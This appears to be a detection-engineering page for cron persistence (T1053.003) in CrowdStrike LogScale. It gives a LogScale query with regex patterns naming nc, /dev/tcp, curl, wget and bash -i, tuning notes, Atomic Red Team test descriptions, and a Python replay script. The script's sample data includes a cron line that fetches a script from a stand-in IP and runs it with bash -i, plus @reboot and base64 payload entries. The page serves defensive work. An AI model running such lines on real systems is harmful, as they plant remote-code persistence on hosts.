Detect Cron in CrowdStrike LogScale
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Adversaries use cron in Linux, macOS, and ESXi environments to execute programs at system startup or on a scheduled basis for persistence, privilege escalation, or execution. Real-world malware families including Kinsing, Skidmap, GoldMax, NKAbuse, Rocke, and Anchor have all leveraged cron for persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root).
MITRE ATT&CK
- Technique: T1053 Scheduled Task/Job
- Sub-technique: T1053.003 Cron
- Canonical reference: https://attack.mitre.org/techniques/T1053/003/
LogScale Detection Query
// T1053.003 - Cron Persistence Detection
// Pattern 1: crontab process execution with suspicious indicators
#event_simpleName = ProcessRollup2
| CommandLine = /crontab/i
| CommandLine = /(wget|curl|nc\s|ncat|netcat|\/dev\/tcp|base64\s+-d|openssl\s+enc|bash\s+-i|python\s+-c|perl\s+-e|\/tmp\/|\/dev\/shm\/|chmod\s+\+x|chmod\s+777|\.sh|@reboot)/i
| groupBy([aid, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine], function=count(aid, as=event_count))
| sort(event_count, order=desc)

// Pattern 2: file writes to cron directories from suspicious parent processes
// (Run as a separate query or union)
// NOTE: TargetFileName is populated by file-write events rather than by process
// events; point #event_simpleName at the file-write event type your sensors emit.
#event_simpleName = SyntheticProcessRollup2 OR #event_simpleName = ProcessRollup2
| TargetFileName = /(\/etc\/crontab|\/var\/spool\/cron|\/etc\/cron\.d\/|\/etc\/cron\.(daily|hourly|weekly|monthly)|\/var\/cron\/tabs)/i
// Exclude known-good writers of cron files (package managers, config management)
| NOT in(FileName, values=["dpkg", "apt", "apt-get", "yum", "rpm", "ansible", "puppet", "chef-client"])
| cron_path := TargetFileName
// Indicator flags are numeric (1/0) so they can be summed directly.
// has_tmp_write is checked against the command line: TargetFileName is already
// constrained to cron directories above and could never match /tmp/ or /dev/shm/.
| has_tmp_write := if(CommandLine = /\/tmp\/|\/dev\/shm\//, then=1, else=0)
| is_crontab_cmd := if(FileName = "crontab", then=1, else=0)
| has_download_tool := if(CommandLine = /wget|curl|\/dev\/tcp|base64\s+-d/, then=1, else=0)
| has_shell_payload := if(CommandLine = /bash\s+-i|python\s+-c|perl\s+-e|sh\s+-c/, then=1, else=0)
| suspicion_score := is_crontab_cmd + has_download_tool + has_shell_payload + has_tmp_write
| suspicion_score > 0
| risk_level := if(suspicion_score >= 3, then="CRITICAL", else=if(suspicion_score >= 2, then="HIGH", else=if(suspicion_score >= 1, then="MEDIUM", else="LOW")))
| table([@timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, cron_path, has_download_tool, has_shell_payload, suspicion_score, risk_level])
| sort(suspicion_score, order=desc)

Detects T1053.003 cron persistence in CrowdStrike Falcon LogScale via two correlated patterns: (1) ProcessRollup2 events where the command line references crontab combined with suspicious payload indicators (download tools, reverse shells, temp paths, chmod), and (2) file writes targeting cron directories from processes that are not known package managers. Applies a suspicion scoring model and risk classification. Covers Linux and macOS hosts reporting to Falcon.
False Positives & Tuning
- Legitimate DevOps engineers running crontab -e interactively on Linux servers during scheduled maintenance windows
- Automated provisioning scripts executed by cloud-init or userdata on newly launched Linux instances that configure application cron jobs
- Monitoring and observability agents that use cron scheduling for metric collection and may reference paths in /tmp/ for temporary data storage
Testing Methodology
Validate this detection against four Atomic Red Team tests for this technique. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Add Persistent Cron Job via crontab Command
  Expected signal: Auditd: syscall write/open on /var/spool/cron/crontabs/<username>. Syslog/cron log: CMD (/tmp/argus_test.sh) entries every minute. Process creation event for crontab command. File creation event for /tmp/argus_test.sh.
- Test 2: Add @reboot Persistence Entry to Crontab
  Expected signal: Auditd: write to /var/spool/cron/crontabs/<username> with @reboot content. Syslog: crontab modification event. Process creation for crontab command. File creation for /tmp/argus_backdoor_test.sh with chmod +x.
- Test 3: Direct Write to /etc/cron.d/ for System-Wide Persistence
  Expected signal: Auditd: file creation syscall on /etc/cron.d/argus-test-job. File creation event with initiating process bash/sudo. Syslog: within 5 minutes, CRON execution of curl command will appear in /var/log/cron or /var/log/syslog.
- Test 4: Cron Job with Base64-Encoded Payload Download
  Expected signal: File creation event on /etc/cron.d/argus-encoded-test. Cron execution logs showing base64 and bash commands. If wget succeeds (requires listener), process creation for wget and the payload. Auditd syscall records for file write.
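As an added example (not the page's query and not CrowdStrike code), the Python below replays the query's suspicion-scoring model offline over constructed syslog cron lines and a constructed crontab file, so the expected signals listed in the tests above (CMD entries for /tmp scripts, crontab modifications, base64 and download tools, @reboot entries) can be checked without a Falcon tenant. The four indicator regexes, the package-manager exclusion from the tuning notes and the CRITICAL/HIGH/MEDIUM/LOW thresholds are transcribed from the query; the extra `runs_at_reboot` flag, the syslog line formats and every sample value are assumptions made for this example.

```python
"""Offline replica of the cron suspicion-scoring model over constructed log data.
Added example; the regexes mirror the LogScale query, everything else is assumed."""
import re
from dataclasses import dataclass, field

# Indicator regexes transcribed from the query's scoring block.
INDICATORS = {
    "has_download_tool": re.compile(r"wget|curl|/dev/tcp|base64\s+-d", re.I),
    "has_shell_payload": re.compile(r"bash\s+-i|python\s+-c|perl\s+-e|sh\s+-c", re.I),
    "has_tmp_write":     re.compile(r"/tmp/|/dev/shm/", re.I),
    # Assumed extension of the four-flag model: crontab entries that run at boot.
    "runs_at_reboot":    re.compile(r"^\s*@reboot\b", re.I),
}

# Known-good writers of cron files, as excluded by the query's NOT in(...) clause.
KNOWN_GOOD_PROCESSES = {"dpkg", "apt", "apt-get", "yum", "rpm",
                        "ansible", "puppet", "chef-client"}

# Assumed syslog formats for cron(8) job execution and crontab(1) edits.
CRON_CMD = re.compile(r"CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)\s*$")
CRONTAB_EDIT = re.compile(r"crontab\[\d+\]: \((?P<user>[^)]+)\) "
                          r"(?P<action>REPLACE|BEGIN EDIT|END EDIT)")


@dataclass
class Finding:
    source: str
    user: str
    command: str
    flags: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.flags)

    @property
    def risk_level(self) -> str:
        # Same thresholds as the query: >=3 CRITICAL, >=2 HIGH, >=1 MEDIUM, else LOW.
        if self.score >= 3:
            return "CRITICAL"
        if self.score >= 2:
            return "HIGH"
        if self.score >= 1:
            return "MEDIUM"
        return "LOW"


def flags_for(command: str, via_crontab: bool = False, process: str = "") -> list:
    """Return the indicator names that fire for one command line or crontab entry."""
    if process in KNOWN_GOOD_PROCESSES:
        return []  # package managers legitimately write cron files
    flags = [name for name, rx in INDICATORS.items() if rx.search(command)]
    if via_crontab:
        flags.append("is_crontab_cmd")
    return flags


def scan_syslog(lines):
    """Score cron CMD executions and crontab REPLACE events from syslog-style lines."""
    findings = []
    for line in lines:
        m = CRON_CMD.search(line)
        if m:
            f = Finding("cron", m["user"], m["cmd"], flags_for(m["cmd"]))
        else:
            m = CRONTAB_EDIT.search(line)
            if not m or m["action"] != "REPLACE":
                continue  # BEGIN/END EDIT alone does not modify the crontab
            f = Finding("crontab", m["user"], line.split(": ", 1)[1],
                        flags_for("", via_crontab=True))
        if f.score > 0:  # mirrors "| suspicion_score > 0"
            findings.append(f)
    return findings


def scan_crontab(text: str, user: str):
    """Score each entry of a crontab file; comments and blank lines are ignored."""
    findings = []
    for entry in text.splitlines():
        if not entry.strip() or entry.lstrip().startswith("#"):
            continue
        f = Finding("crontab-file", user, entry, flags_for(entry))
        if f.score > 0:
            findings.append(f)
    return findings


# Constructed sample input (not real telemetry).
SAMPLE_SYSLOG = [
    "Jan 10 12:00:01 web01 CRON[2211]: (root) CMD (/usr/lib/sysstat/sa1 1 1)",
    "Jan 10 12:01:01 web01 CRON[2230]: (root) CMD (/tmp/argus_test.sh)",
    "Jan 10 12:02:13 web01 crontab[2250]: (alice) BEGIN EDIT (alice)",
    "Jan 10 12:02:40 web01 crontab[2250]: (alice) REPLACE (alice)",
    "Jan 10 12:05:01 web01 CRON[2290]: (root) CMD (curl -s http://203.0.113.10/x -o /tmp/x.sh && bash -i /tmp/x.sh)",
]

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /dev/shm/.x/run.sh
*/5 * * * * echo aGVsbG8= | base64 -d > /tmp/.o
"""

if __name__ == "__main__":
    for f in scan_syslog(SAMPLE_SYSLOG) + scan_crontab(SAMPLE_CRONTAB, "root"):
        print(f"{f.risk_level:8} score={f.score} {f.source:12} {f.user:6} {f.command}")
```

Entries that fire no indicator (the sysstat job, the certbot renewal) are dropped just as the query's `suspicion_score > 0` filter drops them, while an interactive crontab REPLACE by a user scores MEDIUM on its own; that is exactly the DevOps maintenance case from the tuning notes, so a per-user or per-host allowlist belongs at that point rather than in the indicator set.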
References
- https://attack.mitre.org/techniques/T1053/003/
- https://www.cloudsek.com/blog/analysis-of-files-used-in-esxiargs-ransomware-attack-against-vmware-esxi-servers
- https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- https://research.checkpoint.com/2019/speakup-a-new-undetected-backdoor-linux-threat/
- https://blog.aquasec.com/threat-alert-kinsing-malware-container
- https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html
- https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html
- https://www.crowdstrike.com/blog/carbon-spider-skeleton-spider-target-esxi-servers-with-novel-ransomware/
- https://www.welivesecurity.com/2022/01/11/signed-sealed-delivered-securing-operational-technology/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md
- https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd
- https://linux.die.net/man/5/crontab
- https://www.sans.org/white-papers/1693/